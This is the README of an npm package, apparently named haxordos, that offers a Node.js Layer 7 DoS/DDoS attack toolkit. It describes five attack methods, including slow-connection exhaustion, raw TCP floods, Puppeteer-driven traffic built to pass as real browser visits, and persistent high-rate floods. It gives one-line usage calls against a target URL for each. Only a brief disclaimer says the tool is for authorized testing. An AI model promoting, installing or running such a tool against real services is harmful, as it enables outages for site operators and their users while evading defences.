haxordos
Version:
<div align="center"> <a href="https://www.npmjs.com/package/haxordos" title="npm version"> <img src="https://img.shields.io/npm/v/haxordos?color=brightgreen&style=for-the-badge" alt="npm version"> </a> <a href="https://www.npmjs.com/package/haxo
203 lines (139 loc) • 6.25 kB
Markdown
# HAXOR Denial of Service WITH NODE JS
<div align="center">
<a href="https://www.npmjs.com/package/haxordos" title="npm version">
<img src="https://img.shields.io/npm/v/haxordos?color=brightgreen&style=for-the-badge" alt="npm version">
</a>
<a href="https://www.npmjs.com/package/haxordos" title="npm downloads">
<img src="https://img.shields.io/npm/dt/haxordos?color=yellow&style=for-the-badge" alt="npm downloads">
</a>
<a href="https://www.npmjs.com/package/haxordos" title="npm license">
<img src="https://img.shields.io/npm/l/haxordos?color=blue&style=for-the-badge" alt="npm license">
</a>
<a href="https://www.npmjs.com/package/haxordos" title="package">
<img src="https://img.shields.io/npm/v/haxordos?label=package&logo=npm&style=for-the-badge" alt="package">
</a>
<a href="https://nodejs.org/api/modules.html" title="CommonJS module format">
<img src="https://img.shields.io/badge/Module-CommonJS-yellow?style=for-the-badge" alt="CommonJS">
</a>

<p><strong>A powerful Layer 7 DoS/DDoS testing toolkit built with Node.js</strong></p>
</div>
## 📋 Overview
> *DDoS is an amplified DoS attack that uses multiple computers (botnet) simultaneously. One type targets Layer 7 (application layer), where the attack floods the application with seemingly legitimate requests (like repeatedly reloading pages), causing the server to go down due to resource exhaustion while processing them.*
## ✨ Features
- 🎯 **Multiple Attack Vectors** - Five different Layer 7 attack methods
- ⚡ **High Performance** - Optimized for maximum efficiency
- 🔄 **TCP Socket Support** - Raw TCP connection capabilities
- 🤖 **Browser Automation** - Stealth mode using Puppeteer
- 🔍 **Smart Reconnaissance** - Automatic target pre-scanning
- 📊 **Real-time Validation** - Connection status monitoring
- 🛡️ **Adaptive Mechanism** - Persistent attack loops
## 🚀 Installation
```bash
# npm install:
npm install haxordos
# yarn install:
yarn add haxordos
```
## 📖 Quick Start
### Basic Usage
```js
const hacxorDos = require('haxordos');
hacxorDos.SlowRiss('https://target.com', 300);
hacxorDos.netTcp('https://target.com', 300);
hacxorDos.fastDuck('https://target.com', 300);
hacxorDos.CrawlDos('https://target.com', 300);
hacxorDos.httpEndpoint('https://target.com/home/user/', 300);
```
### Import Module
```js
const hacxorDos = require('haxordos');
```
## 🔧 Methods Documentation
### 1. SlowRiss
```js
hacxorDos.SlowRiss('https://target.com', 300);
```
**Description:**
Layer 7 DoS attack that holds many HTTP connections by sending data slowly or partially, causing the server to run out of available slots.
**Parameters:**
- `target` (string): Target URL
- `intensity` (number): Attack intensity level
### 2. netTcp
```js
hacxorDos.netTcp('https://target.com', 300);
```
**Description:**
Layer 7 DDoS attack that uses raw TCP sockets to establish direct network connections, then sends HTTP GET requests.
**Parameters:**
- `target` (string): Target URL
- `intensity` (number): Attack intensity level
### 3. fastDuck
```js
hacxorDos.fastDuck('https://target.com', 300);
```
**Description:**
Layer 7 DoS attack named FastDuck because it combines high-speed requests with stealth techniques using browser automation (Puppeteer) to generate traffic that is technically identical to legitimate user visits, including complete browser fingerprints, valid security headers, and session cookies.
**Parameters:**
- `target` (string): Target URL
- `intensity` (number): Attack intensity level
### 4. CrawlDos
```js
hacxorDos.CrawlDos('https://target.com/home/user/', 300);
```
**Description:**
Layer 7 DoS with Adaptive Persistence Mechanism that features automatic reconnaissance through target pre-scanning and continuous attack loops, combining high volume (300 requests/100ms) with real-time connectivity validation to ensure attack effectiveness even against dynamic targets.
**Parameters:**
- `target` (string): Target URL with endpoint
- `intensity` (number): Attack intensity level
### 5. httpEndpoint
```js
hacxorDos.httpEndpoint('https://target.com/home/user/', 300);
```
**Description:**
Targeted endpoint attack focusing on specific application routes.
**Parameters:**
- `target` (string): Target URL with specific endpoint
- `intensity` (number): Attack intensity level
## 💼 Ready-to-Use Stresser Script Example
This is an example of a complete testing tool
### Preview

<div align="center">
[](https://github.com/REYHAN6610/haxorDos)
</div>
## 📊 Feature Status
| Feature | Status | Description |
|----------------------|--------|------------------------------------------------|
| SlowRiss | ✅ | Slow HTTP connection attack |
| netTcp | ✅ | Raw TCP socket-based attack |
| fastDuck | ✅ | Browser automation stealth attack |
| CrawlDos | ✅ | Adaptive reconnaissance attack |
| httpEndpoint | ✅ | Targeted endpoint attack |
| Multi-threading | ✅ | Concurrent request handling |
## ⚠️ Disclaimer
**IMPORTANT:** This tool is intended for **educational purposes** and **authorized security testing only**.
- ⚖️ Unauthorized use of this tool against systems you don't own or have explicit permission to test is **illegal**
- 🔒 Always obtain proper authorization before conducting any security tests
- 📜 Users are solely responsible for compliance with applicable laws and regulations
- 🛡️ The developers assume no liability for misuse or damage caused by this software
<div align="center">
<strong>Please Donate:</strong>
<br>
<a href="https://saweria.co/reyhantanpahutang">
<img src="https://img.shields.io/badge/Donate-Saweria-orange?style=for-the-badge&logo=buymeacoffee" alt="Donate via Saweria">
</a>
</div>